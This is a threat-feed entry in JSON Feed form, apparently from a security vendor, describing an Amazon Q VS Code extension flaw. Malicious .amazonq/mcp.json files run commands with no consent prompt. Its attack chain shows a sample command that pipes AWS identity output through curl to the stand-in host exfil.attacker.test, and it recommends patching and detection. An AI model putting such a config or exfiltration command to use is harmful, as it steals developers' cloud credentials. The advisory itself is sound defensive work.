{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/code-editor/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:a:anthropic:claude_code:*:*:*:*:*:node.js:*:*","cpe:2.3:a:anysphere:cursor:*:*:*:*:*:*:*:*","cpe:2.3:a:linuxfoundation:runc:*:*:*:*:*:*:*:*","cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-12958"},{"cvss":8.8,"id":"CVE-2025-59536"},{"cvss":7.2,"id":"CVE-2025-54136"},{"cvss":8,"id":"CVE-2026-30615"},{"cvss":8.6,"id":"CVE-2024-21626"}],"_cs_exploited":false,"_cs_has_poc":true,"_cs_poc_references":[],"_cs_products":["Amazon Q Developer Extension for Visual Studio Code (language server version \u003c 1.65.0)","Amazon Q Developer","Language Servers for AWS (\u003c 1.69.0)","VS Code plugin for Amazon Q (\u003c 2.20)","JetBrains plugin for Amazon Q (\u003c 4.3)","Eclipse plugin for Amazon Q (\u003c 2.7.4)","Visual Studio toolkit for Amazon Q (\u003c 1.94.0.0)","Claude Code","Cursor","Windsurf","Amazon Q Developer extension","AWS Language Server (\u003c 1.65.0)","Amazon Q developer extension for Visual Studio Code","Amazon Q Developer (language server version \u003c 1.69.0)","Google Antigravity (1.19.6)","Cursor (\u003c 3.0)","Augment (0.754.3)","Windsurf (V1.9566)","Anthropic Claude Code (v2.1.42)"],"_cs_severities":["high"],"_cs_tags":["vulnerability","code-editor","cloud","rce","vs-code","supply-chain"],"_cs_type":"advisory","_cs_vendors":["Amazon Web Services","Amazon","Microsoft","JetBrains","Eclipse Foundation","Anthropic","Cursor","Windsurf","Google","Augment"],"content_html":"\u003cp\u003eWiz Research discovered a high-severity vulnerability, CVE-2026-12957, in the Amazon Q Developer Extension for Visual Studio Code, impacting language server versions prior to 1.65.0. This flaw allowed for arbitrary code execution and cloud credential theft. When a developer opened a malicious repository containing a specially crafted \u003ccode\u003e.amazonq/mcp.json\u003c/code\u003e file, Amazon Q would automatically load and execute Model Context Protocol (MCP) server configurations defined within this file. Critically, this execution occurred without user consent, workspace trust checks, or any visible indicators, and the spawned processes inherited the developer's full environment, including sensitive AWS credentials, API keys, and SSH agent sockets. This vulnerability, which demonstrates a broader pattern affecting AI coding tools, has since been remediated by Amazon in language server version 1.65.0, which now implements a consent prompt.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious repository containing a \u003ccode\u003e.amazonq/mcp.json\u003c/code\u003e file that defines an MCP server with a malicious command (e.g., \u003ccode\u003ebash -c \u0026quot;aws sts get-caller-identity | curl...\u0026quot;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker induces a developer to clone the malicious repository, potentially through social engineering, typosquatting, or malicious pull requests.\u003c/li\u003e\n\u003cli\u003eThe developer opens the cloned repository in VS Code, with the Amazon Q Developer Extension installed and active.\u003c/li\u003e\n\u003cli\u003eAmazon Q automatically loads and executes the malicious MCP server configuration from the \u003ccode\u003e.amazonq/mcp.json\u003c/code\u003e file located in the workspace root without prompting the user for consent.\u003c/li\u003e\n\u003cli\u003eThe malicious command executes on the developer's machine, inheriting their complete environment, including sensitive AWS credentials (e.g., \u003ccode\u003eAWS_ACCESS_KEY_ID\u003c/code\u003e, \u003ccode\u003eAWS_SECRET_ACCESS_KEY\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe output of the command, containing the developer's active AWS session information (e.g., from \u003ccode\u003eaws sts get-caller-identity\u003c/code\u003e), is exfiltrated to the attacker's controlled endpoint (e.g., \u003ccode\u003eexfil.attacker.test\u003c/code\u003e) via \u003ccode\u003ecurl\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen AWS credentials to gain unauthorized access, establish persistence, or perform lateral movement within the developer's associated cloud environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of CVE-2026-12957 results in immediate arbitrary code execution on the victim's machine with minimal user interaction, often occurring silently without visible indicators. This leads to the theft of cloud credentials (AWS, GCP, Azure), API keys, and other secrets, enabling attackers to establish cloud persistence by backdooring IAM users or infrastructure. The attacker can then perform supply chain attacks targeting maintainers of popular projects or conduct lateral movement into production systems if the developer has sufficient access. This vulnerability facilitates critical compromise of development environments and cloud resources, posing a significant risk to an organization's software supply chain and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade the Amazon Q Developer Extension for Visual Studio Code to language server version 1.65.0 or later to patch CVE-2026-12957.\u003c/li\u003e\n\u003cli\u003eEducate developers to be cautious with untrusted repositories and review MCP consent prompts carefully when displayed by Amazon Q.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided in this brief to your SIEM to detect suspicious credential exfiltration attempts.\u003c/li\u003e\n\u003cli\u003eMonitor for the creation or modification of \u003ccode\u003e.amazonq/mcp.json\u003c/code\u003e files in development repositories, particularly in untrusted contexts.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003eexfil.attacker.test\u003c/code\u003e listed in the IOC table at the DNS resolver and network perimeter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-08T14:08:45Z","date_published":"2026-06-26T12:13:02Z","id":"https://feed.craftedsignal.io/briefs/2026-06-amazon-q-rce/","summary":"A high-severity vulnerability (CVE-2026-12957) in the Amazon Q Developer Extension for Visual Studio Code allowed attackers to achieve arbitrary code execution and cloud credential theft by automatically loading and executing malicious Model Context Protocol (MCP) server configurations from a `.amazonq/mcp.json` file in a repository without user consent, providing full access to a developer's environment and cloud credentials.","title":"CVE-2026-12957: Amazon Q VS Code Extension Arbitrary Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-06-amazon-q-rce/"}],"language":"en","title":"CraftedSignal Threat Feed - Code-Editor","version":"https://jsonfeed.org/version/1.1"}